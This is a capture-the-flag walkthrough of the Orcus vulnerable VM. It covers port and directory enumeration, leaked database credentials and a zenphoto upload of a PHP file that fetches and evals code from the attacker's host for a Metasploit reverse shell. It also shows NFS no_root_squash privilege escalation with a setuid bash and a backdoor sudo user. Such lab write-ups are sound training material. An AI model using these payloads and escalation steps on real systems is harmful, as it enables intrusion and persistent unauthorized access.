CTF Orcus from Viper (hackfest 2016)

Hello guys,  it’s my third Vulnerable VM by @ViperBlackSkull if you need more information you can reach me on twitter at @marghost.  You can get the virtual machine HERE. So lets get started.

This vm is tagged as hard and it is!  First i did a nmap

root@kali:~# nmap -T4 -A -v 192.168.1.21
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-22 13:33 EDT
Discovered open port 443/tcp on 192.168.1.21
Discovered open port 143/tcp on 192.168.1.21
Discovered open port 139/tcp on 192.168.1.21
Discovered open port 995/tcp on 192.168.1.21
Discovered open port 22/tcp on 192.168.1.21
Discovered open port 993/tcp on 192.168.1.21
Discovered open port 445/tcp on 192.168.1.21
Discovered open port 80/tcp on 192.168.1.21
Discovered open port 111/tcp on 192.168.1.21
Discovered open port 53/tcp on 192.168.1.21
Discovered open port 110/tcp on 192.168.1.21
Discovered open port 2049/tcp on 192.168.1.21

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp   open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      40370/tcp  mountd
|   100005  1,2,3      54899/udp  mountd
|   100021  1,3,4      32978/tcp  nlockmgr
|   100021  1,3,4      55763/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 08:00:27:60:FE:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.048 days (since Wed Mar 22 12:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok so summary we have a webserver a rpc server with nfs and maybe accessible directory. We have two ssh server, this is odd. We have a samba server.

So next step is to nikto this server and see what is going on.

root@kali:~# nikto -h 192.168.1.21
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2017-03-22 16:44:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-22 16:44:26 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Soooo we have a some portal and phpmyadmin installed. We will see the robot and the readme/changelog/license of the server.

The robots.txt do not help. The readme/license file say to us that we have an install of Exponent CMS and from the changelog we learn that we have the version 2.3.9.
A quick exploit search say that it il vuln from sql injection, but as i go to the index.php i try some and it is not working, i also see that the portal disclame the db is offline so it is a dead end.
The phpmyadmin default login do not work. I searched the other directories that nikto revealed and noting interesting to be found.

So as the creator of the VM invite us to do extended enumeration i will try some other information gathering tools.

So for enumeration sake i will use enum4linux tool to see what i can get

root@kali:~# enum4linux -a -o -n -v 192.168.1.21
Target ........... 192.168.1.21
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.21 |
====================================================
[V] Attempting to get domain name with command: nmblookup -A '192.168.1.21'
[+] Got domain/workgroup name: WORKGROUP

============================================
| Nbtstat Information for 192.168.1.21 |
============================================
Looking up status of 192.168.1.21
ORCUS <00> - B <ACTIVE> Workstation Service
ORCUS <03> - B <ACTIVE> Messenger Service
ORCUS <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.1.21 |
=====================================
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 192.168.1.21 allows sessions using username '', password ''

===========================================
| Getting domain SID for 192.168.1.21 |
===========================================
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 192.168.1.21 -c 'lsaquery' 2>&1
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

======================================
| OS information on 192.168.1.21 |
======================================
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 192.168.1.21 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '192.168.1.21' 2>&1
[+] Got OS info for 192.168.1.21 from srvinfo:
ORCUS Wk Sv PrQ Unx NT SNT Orcus server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

=============================
| Users on 192.168.1.21 |
=============================
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '192.168.1.21' 2>&1
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '192.168.1.21' 2>&1
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]

=========================================
| Share Enumeration on 192.168.1.21 |
=========================================
[V] Attempting to get share list using authentication
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Orcus server (Samba, Ubuntu))

Server Comment
--------- -------
ORCUS Orcus server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP ORCUS

[+] Attempting to map shares on 192.168.1.21
[V] Attempting map to share //192.168.1.21/print$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'print$' -U''%'' -c dir 2>&1
//192.168.1.21/print$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //192.168.1.21/IPC$ with command: smbclient -W 'WORKGROUP' //'192.168.1.21'/'IPC$' -U''%'' -c dir 2>&1
//192.168.1.21/IPC$ Mapping: OK Listing: DENIED

====================================================
| Password Policy Information for 192.168.1.21 |
====================================================
[V] Attempting to get Password Policy info with command: polenum '':''@'192.168.1.21' 2>&1
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.21 |
==============================
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

=======================================================================
| Users on 192.168.1.21 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] User "administrator" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] User "guest" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] User "krbtgt" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] User "domain admins" doesn't exist. User enumeration should be possible, but SID needed...
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[I] Found new SID: S-1-5-21-2160833340-863236869-394548843
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[I] Found new SID: S-1-22-1
[V] Attempting to get SID from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 192.168.1.21 with command: rpcclient -W 'WORKGROUP' -U''%'' '192.168.1.21' -c lsaenumsid 2>&1
[V] Processing SID S-1-5-32-550
[I] Found new SID: S-1-5-32
[V] Processing SID S-1-5-32-548
[V] Processing SID S-1-5-32-551
[V] Processing SID S-1-5-32-549
[V] Processing SID S-1-5-32-544
[V] Processing SID S-1-1-0
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kippo (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2160833340-863236869-394548843 and logon username '', password ''
S-1-5-21-2160833340-863236869-394548843-501 ORCUS\nobody (Local User)
S-1-5-21-2160833340-863236869-394548843-513 ORCUS\None (Domain Group)
S-1-5-21-2160833340-863236869-394548843-1000 ORCUS\viper (Local User)
S-1-5-21-2160833340-863236869-394548843-1001 ORCUS\root (Local User)

So we find basic access to samba and rpc and with those we find the users viper root.  We found user kippo when enumerating user SID.  Looking like a manga name, I will maybe investigate on this.

Dirb with the big dictionary is my next step.

root@kali:~# dirb http://192.168.1.21 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Mar 22 17:16:24 2017
URL_BASE: http://192.168.1.21/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.21/ ----
==> DIRECTORY: http://192.168.1.21/FCKeditor/
+ http://192.168.1.21/LICENSE (CODE:200|SIZE:15437)
==> DIRECTORY: http://192.168.1.21/admin/
==> DIRECTORY: http://192.168.1.21/backups/
==> DIRECTORY: http://192.168.1.21/cron/
==> DIRECTORY: http://192.168.1.21/external/
==> DIRECTORY: http://192.168.1.21/files/
==> DIRECTORY: http://192.168.1.21/framework/
==> DIRECTORY: http://192.168.1.21/install/
==> DIRECTORY: http://192.168.1.21/javascript/
==> DIRECTORY: http://192.168.1.21/phpmyadmin/
+ http://192.168.1.21/robots.txt (CODE:200|SIZE:1347)
+ http://192.168.1.21/server-status (CODE:403|SIZE:300)
+ http://192.168.1.21/sitemap.xml (CODE:200|SIZE:113)
==> DIRECTORY: http://192.168.1.21/themes/
==> DIRECTORY: http://192.168.1.21/tmp/
+ http://192.168.1.21/webalizer (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.21/zenphoto/

---- Entering directory: http://192.168.1.21/FCKeditor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.21/install/ ----
==> DIRECTORY: http://192.168.1.21/install/changes/
==> DIRECTORY: http://192.168.1.21/install/files/
==> DIRECTORY: http://192.168.1.21/install/images/
==> DIRECTORY: http://192.168.1.21/install/include/
==> DIRECTORY: http://192.168.1.21/install/pages/
==> DIRECTORY: http://192.168.1.21/install/popups/
==> DIRECTORY: http://192.168.1.21/install/samples/
==> DIRECTORY: http://192.168.1.21/install/upgrades/

---- Entering directory: http://192.168.1.21/javascript/ ----
==> DIRECTORY: http://192.168.1.21/javascript/jquery/

---- Entering directory: http://192.168.1.21/phpmyadmin/ ----

---- Entering directory: http://192.168.1.21/zenphoto/ ----
+ http://192.168.1.21/zenphoto/LICENSE (CODE:200|SIZE:18205)
==> DIRECTORY: http://192.168.1.21/zenphoto/albums/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache/
==> DIRECTORY: http://192.168.1.21/zenphoto/cache_html/
==> DIRECTORY: http://192.168.1.21/zenphoto/plugins/
+ http://192.168.1.21/zenphoto/robots.txt (CODE:200|SIZE:471)
==> DIRECTORY: http://192.168.1.21/zenphoto/themes/
==> DIRECTORY: http://192.168.1.21/zenphoto/uploaded/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-data/
---- Entering directory: http://192.168.1.21/zenphoto/zp-core/ ----
+ http://192.168.1.21/zenphoto/zp-core/dataaccess (CODE:200|SIZE:187)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/exif/
+ http://192.168.1.21/zenphoto/zp-core/htaccess (CODE:200|SIZE:546)
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/images/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/js/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/locale/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/setup/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/utilities/
==> DIRECTORY: http://192.168.1.21/zenphoto/zp-core/watermarks/
DOWNLOADED: 1575266 - FOUND: 13

I cleaned it a little and some interesting things where found.  the zenphoto directory is an app that let user upload images, interesting for a web_delivery attack.  There is a backups directory that nikto didint found the first time.  some interesting things are there.  SSH credentials that i cant download for now and a zipped file.  Lets go and download it.  There is a db_conn.php file that contained :

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

So next I will try to login into zenphoto. Ok into zenphoto i did the setup and everyting worked out fine, i could upload a php web_delivery and accessed it via the /zenphoto/albums/ directory.
This is how i made the web_delivery exploit with metasploit :

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
set uripath v9HL33yWdUR4KFo
run

Created a webdelivery.php file and filled it like this :

<?php
eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo'));
?>

After I zipped it and uploaded it with zenphoto.  It worked like a charm and when i went to the /zenphoto/albums/ i found my webdelivery.php file.  Just opened it and. Then you will be prompted by metasploit to open a session, just log into put the shell command and load bash.

sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'

Now i have a terminal access 😀

And BAM the first flag!

[*] Meterpreter session 1 opened (192.168.1.14:4444 -> 192.168.1.21:58000) at 2017-03-22 23:56:38 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5753 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Orcus:/var/www/html/zenphoto/albums/webdelivery-1$ cd /var/www
www-data@Orcus:/var/www$ ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4

So next i did a linuxprivchecker to search for an escalation exploit.

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod +x linuxprivatechecker.py
python ./linuxprivchecker.py
I found that the mysql server was vuln, BUT secure_file_priv is activated so no chance to exploit raptor_udf2 with dbuser.
git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git

Noting to be found here either

git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
./LinEnum.sh

First thing i saw is the .youwillfindnothinghere and i was thinking MEH maybe but nooo

cd /home/.youwillfindnothinghere
www-data@Orcus:/home/.youwillfindnothinghere$ ls
ls
itoldyou
www-data@Orcus:/home/.youwillfindnothinghere$ cat itoldyou
cat itoldyou

PFFFF

But LinEnum found something usefull :

NFS config details: 
-rw-r--r-- 1 root root 415 Oct 18 19:56 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)

OH yea no_root_squash. That mean if me as a root upload a file to the server il will not be downgraded as nobody it will stay ‘root’. This can be used to escalate priv.!!

First on kali you need to install nfs-common (wtf kali)

showmount -e 192.168.1.21
Export list for 192.168.1.21:
/tmp *

As expected

mount -t nfs 192.168.1.22:/tmp /tmpvictim -o nolock

Into the VM

cp /bin/bash /tmp/bash

From kali

cp /tmpvictim/bash /tmpvictim/vulnbash

chmod 4777 vulnbash

Back to the vm just execute

vulnbash -p

Yesser miller we got root but to make it more stable i will create an user and log into ssh

openssl passwd -crypt test
SSybfm7a0XqFo
useradd -p SSybfm7a0XqFo -s /bin/bash -g 0 groot
usermod -aG sudo groot
root@kali:/tmpvictim# ssh groot@192.168.1.22
groot@Orcus:/$ id
uid=1007(groot) gid=0(root) groups=0(root),27(sudo)
groot@Orcus:/$ sudo su
sudo: unable to resolve host Orcus
root@Orcus:/# id
uid=0(root) gid=0(root) groups=0(root)

Second flag

root@Orcus:~# cat flag.txt
807307b49314f822985d0410de7d8bfe

I found that what it is making this VM unique. After some search for the user kippo i found earlier, it is the user used by the kippo honeypot. Both last machine didint have an honeypot! So i am going to investigate to find a flag there.

third flag, i found that poking around :

root@Orcus:/etc/kippo# cd data
 root@Orcus:/etc/kippo/data# ls
 userdb.txt
 root@Orcus:/etc/kippo/data# cat userdb.txt
 root:0:123456
 fakuser:1:TH!SP4SSW0RDIS4Fl4G!

AND its done!

M.

 

Leave a Reply

Your email address will not be published. Required fields are marked *